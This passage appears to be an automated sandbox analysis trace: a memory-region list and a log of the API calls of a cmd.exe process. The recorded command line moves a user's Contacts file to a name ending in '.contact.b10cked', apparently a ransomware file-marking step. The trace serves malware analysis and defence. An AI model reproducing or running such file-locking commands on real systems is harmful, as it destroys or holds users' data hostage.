id = 32995 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32996 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32997 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32998 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 32999 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33000 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33001 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 33002 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 33003 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 33004 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33005 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 33006 start_va = 
0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 33007 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011f0000" filename = "" Thread: id = 773 os_tid = 0x8fc [0220.060] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12faec | out: lpSystemTimeAsFileTime=0x12faec*(dwLowDateTime=0xb7f6c300, dwHighDateTime=0x1d440a9)) [0220.060] GetCurrentProcessId () returned 0xf14 [0220.060] GetCurrentThreadId () returned 0x8fc [0220.060] GetTickCount () returned 0x3d6de [0220.060] QueryPerformanceCounter (in: lpPerformanceCount=0x12fae4 | out: lpPerformanceCount=0x12fae4*=27684933299) returned 1 [0220.061] GetModuleHandleA (lpModuleName=0x0) returned 0x4a1c0000 [0220.061] __set_app_type (_Type=0x1) [0220.061] __p__fmode () returned 0x76b331f4 [0220.061] __p__commode () returned 0x76b331fc [0220.061] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1e21a6) returned 0x0 [0220.061] __getmainargs (in: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c, _DoWildCard=0, _StartInfo=0x4a1e4140 | out: _Argc=0x4a1e4238, _Argv=0x4a1e4240, _Env=0x4a1e423c) returned 0 [0220.061] GetCurrentThreadId () returned 0x8fc [0220.061] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8fc) returned 0x38 [0220.061] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.061] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0220.061] SetThreadUILanguage (LangId=0x0) returned 0x409 [0220.061] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0220.061] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fa7c | out: phkResult=0x12fa7c*=0x0) returned 0x2 [0220.062] VirtualQuery (in: 
lpAddress=0x12fab3, lpBuffer=0x12fa4c, dwLength=0x1c | out: lpBuffer=0x12fa4c*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.062] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fa4c, dwLength=0x1c | out: lpBuffer=0x12fa4c*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0220.062] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fa4c, dwLength=0x1c | out: lpBuffer=0x12fa4c*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0220.062] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fa4c, dwLength=0x1c | out: lpBuffer=0x12fa4c*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0220.062] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fa4c, dwLength=0x1c | out: lpBuffer=0x12fa4c*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0220.062] GetConsoleOutputCP () returned 0x1b5 [0220.062] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.062] SetConsoleCtrlHandler (HandlerRoutine=0x4a1de72a, Add=1) returned 1 [0220.062] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.062] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0220.062] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.062] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1e41ac | out: lpMode=0x4a1e41ac) returned 1 [0220.062] _get_osfhandle (_FileHandle=1) returned 0x7 [0220.062] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0220.062] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.062] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1e41b0 | out: 
lpMode=0x4a1e41b0) returned 1 [0220.063] _get_osfhandle (_FileHandle=0) returned 0x3 [0220.063] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0220.063] GetEnvironmentStringsW () returned 0x320180* [0220.063] FreeEnvironmentStringsW (penv=0x320180) returned 1 [0220.063] GetEnvironmentStringsW () returned 0x320180* [0220.063] FreeEnvironmentStringsW (penv=0x320180) returned 1 [0220.063] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9ec | out: phkResult=0x12e9ec*=0x40) returned 0x0 [0220.063] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x0, lpData=0x12e9f8*=0xa8, lpcbData=0x12e9f0*=0x1000) returned 0x2 [0220.063] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x1, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.063] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x0, lpData=0x12e9f8*=0x1, lpcbData=0x12e9f0*=0x1000) returned 0x2 [0220.063] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x0, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.063] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x40, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.063] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x40, 
lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x0, lpData=0x12e9f8*=0x40, lpcbData=0x12e9f0*=0x1000) returned 0x2 [0220.064] RegCloseKey (hKey=0x40) returned 0x0 [0220.064] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e9ec | out: phkResult=0x12e9ec*=0x40) returned 0x0 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x0, lpData=0x12e9f8*=0x40, lpcbData=0x12e9f0*=0x1000) returned 0x2 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x1, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x0, lpData=0x12e9f8*=0x1, lpcbData=0x12e9f0*=0x1000) returned 0x2 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x0, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x9, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.064] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x4, lpData=0x12e9f8*=0x9, lpcbData=0x12e9f0*=0x4) returned 0x0 [0220.064] RegQueryValueExW (in: 
hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e9f4, lpData=0x12e9f8, lpcbData=0x12e9f0*=0x1000 | out: lpType=0x12e9f4*=0x0, lpData=0x12e9f8*=0x9, lpcbData=0x12e9f0*=0x1000) returned 0x2 [0220.064] RegCloseKey (hKey=0x40) returned 0x0 [0220.064] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b6 [0220.064] srand (_Seed=0x5b8863b6) [0220.064] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked\"" [0220.064] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON\" \"C:\\Users\\EEBsYm5\\Contacts\\uosjfl sidvllie.contact.b10cked\"" [0220.064] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.064] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3218e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0220.065] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0220.065] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.065] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.065] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0220.065] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0220.065] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0220.065] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0220.065] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0220.065] 
_wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0220.065] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0220.065] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0220.065] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0220.065] GetEnvironmentStringsW () returned 0x3222d0* [0220.065] FreeEnvironmentStringsW (penv=0x3222d0) returned 1 [0220.065] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.065] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a1f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0220.065] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0220.065] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0220.065] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0220.065] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0220.065] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0220.065] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0220.065] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0220.065] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0220.065] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f7b8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.065] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12f7b8, lpFilePart=0x12f7b4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12f7b4*="Desktop") returned 0x18 [0220.065] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.066] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f534 | out: lpFindFileData=0x12f534) returned 0x320010 [0220.066] FindClose (in: hFindFile=0x320010 | out: hFindFile=0x320010) returned 1 [0220.066] FindFirstFileW (in: 
lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f534 | out: lpFindFileData=0x12f534) returned 0x320010 [0220.066] FindClose (in: hFindFile=0x320010 | out: hFindFile=0x320010) returned 1 [0220.066] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f534 | out: lpFindFileData=0x12f534) returned 0x320010 [0220.066] FindClose (in: hFindFile=0x320010 | out: hFindFile=0x320010) returned 1 [0220.066] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0220.066] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0220.066] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0220.066] GetEnvironmentStringsW () returned 0x322af0* [0220.066] FreeEnvironmentStringsW (penv=0x322af0) returned 1 [0220.066] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a1e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.067] GetConsoleOutputCP () returned 0x1b5 [0220.067] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a1e4260 | out: lpCPInfo=0x4a1e4260) returned 1 [0220.067] GetUserDefaultLCID () returned 0x409 [0220.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a1e4950, cchData=8 | out: lpLCData=":") returned 2 [0220.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f8f8, cchData=128 | out: lpLCData="0") returned 2 [0220.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f8f8, cchData=128 | out: lpLCData="0") returned 2 [0220.067] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12f8f8, cchData=128 | out: lpLCData="1") returned 2 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a1e4940, cchData=8 | out: lpLCData="/") returned 2 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a1e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0220.068] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x32, lpLCData=0x4a1e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a1e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a1e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a1e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a1e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a1e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a1e4930, cchData=8 | out: lpLCData=".") returned 2 [0220.068] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a1e4920, cchData=8 | out: lpLCData=",") returned 2 [0220.068] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.069] GetConsoleTitleW (in: lpConsoleTitle=0x3108e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.069] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0220.069] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0220.069] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0220.069] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0220.070] _wcsicmp (_String1="move", _String2=")") returned 68 [0220.070] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0220.070] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0220.070] _wcsicmp (_String1="IF", _String2="move") returned -4 [0220.070] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0220.070] _wcsicmp (_String1="REM", _String2="move") returned 5 [0220.070] _wcsicmp (_String1="REM/?", 
_String2="move") returned 5 [0220.072] GetConsoleTitleW (in: lpConsoleTitle=0x12f5f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.072] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0220.072] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0220.072] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0220.072] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0220.072] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0220.072] _wcsicmp (_String1="move", _String2="CD") returned 10 [0220.072] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0220.072] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0220.072] _wcsicmp (_String1="move", _String2="REN") returned -5 [0220.072] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0220.072] _wcsicmp (_String1="move", _String2="SET") returned -6 [0220.072] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0220.072] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0220.072] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0220.073] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0220.073] _wcsicmp (_String1="move", _String2="MD") returned 11 [0220.073] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0220.073] _wcsicmp (_String1="move", _String2="RD") returned -5 [0220.073] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0220.073] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0220.073] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0220.073] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0220.073] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0220.073] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0220.073] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0220.073] _wcsicmp (_String1="move", _String2="VER") returned -9 [0220.073] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0220.073] _wcsicmp 
(_String1="move", _String2="EXIT") returned 8 [0220.073] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0220.073] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0220.073] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0220.073] _wcsicmp (_String1="move", _String2="START") returned -6 [0220.073] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0220.073] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0220.073] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0220.074] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.074] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.074] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f3ac, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f3a4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f3a4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0220.075] _wcsnicmp (_String1="COPYCMD", 
_String2="LOGONSE", _MaxCount=0x7) returned -9 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0220.075] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0220.076] _wcsnicmp (_String1="/Y", _String2="/Y", 
_MaxCount=0x2) returned 0 [0220.076] _wcsicmp (_String1="UOSJFL~1.CON", _String2=".") returned 71 [0220.076] _wcsicmp (_String1="UOSJFL~1.CON", _String2="..") returned 71 [0220.076] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl~1.con")) returned 0x20 [0220.076] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0220.076] SetErrorMode (uMode=0x0) returned 0x0 [0220.076] SetErrorMode (uMode=0x1) returned 0x0 [0220.076] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON", nBufferLength=0x104, lpBuffer=0x12ed34, lpFilePart=0x12ed1c | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON", lpFilePart=0x12ed1c*="UOSJFL~1.CON") returned 0x26 [0220.076] SetErrorMode (uMode=0x0) returned 0x1 [0220.076] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts" (normalized: "c:\\users\\eebsym5\\contacts")) returned 0x13 [0220.076] _wcsicmp (_String1="UOSJFL~1.CON", _String2=".") returned 71 [0220.076] _wcsicmp (_String1="UOSJFL~1.CON", _String2="..") returned 71 [0220.076] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON" (normalized: "c:\\users\\eebsym5\\contacts\\uosjfl~1.con")) returned 0x20 [0220.076] SetErrorMode (uMode=0x0) returned 0x0 [0220.077] SetErrorMode (uMode=0x1) returned 0x0 [0220.077] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON", nBufferLength=0x104, lpBuffer=0x12f1b0, lpFilePart=0x12ef48 | out: lpBuffer="C:\\Users\\EEBsYm5\\Contacts\\UOSJFL~1.CON", lpFilePart=0x12ef48*="UOSJFL~1.CON") returned 0x26 [0220.077] SetErrorMode (uMode=0x0) returned 0x1 [0220.077] SetErrorMode (uMode=0x0) returned 0x0 [0220.077] SetErrorMode (uMode=0x1) returned 0x0 [0220.077] GetFullPathNameW (in: 